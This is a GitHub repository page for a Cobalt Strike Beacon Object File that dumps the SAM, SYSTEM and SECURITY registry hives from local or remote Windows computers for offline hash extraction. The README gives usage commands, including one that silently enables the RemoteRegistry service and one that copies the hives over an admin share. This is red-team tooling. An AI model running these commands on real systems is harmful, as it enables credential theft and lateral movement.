Skip to content
/ BOF-RemoteRegSave Public

Cobalt Strike Beacon Object File (BOF) that uses RegConnectRegistryA + RegOpenKeyExA API to dump registry hives on remote computer

11 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Hagrid29/BOF-RemoteRegSave

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

SOURCE

SOURCE

 
 

Makefile

Makefile

 
 

README.md

README.md

 
 

regdump.x64.o

regdump.x64.o

 
 

regdump.x86.o

regdump.x86.o

 
 

regsave.cna

regsave.cna

 
 

Repository files navigation

BOF - RemoteRegSave

A fork of RegSave BOF. Dump SAM/SYSTEM/SECURITY registry key hives on local or remote computer using RegConnectRegistryA and RegOpenKeyExA for offline parsing and hash extraction.

Usage

Dump registry key hives on local computer (admin elevation required)

RegSave --path [file path <optional>]

Dump registry key hives on remote computer (automatically enable service RemoteRegistry if disabled)

RegSave --pc remotePC --path [file path <optional>]
shell copy \\remoteSrv\C$\Windows\temp\HG029* .

Compile

cd SOURCE
make

References

About

Cobalt Strike Beacon Object File (BOF) that uses RegConnectRegistryA + RegOpenKeyExA API to dump registry hives on remote computer

Resources

Readme
Activity

Stars

11 stars

Watchers

1 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages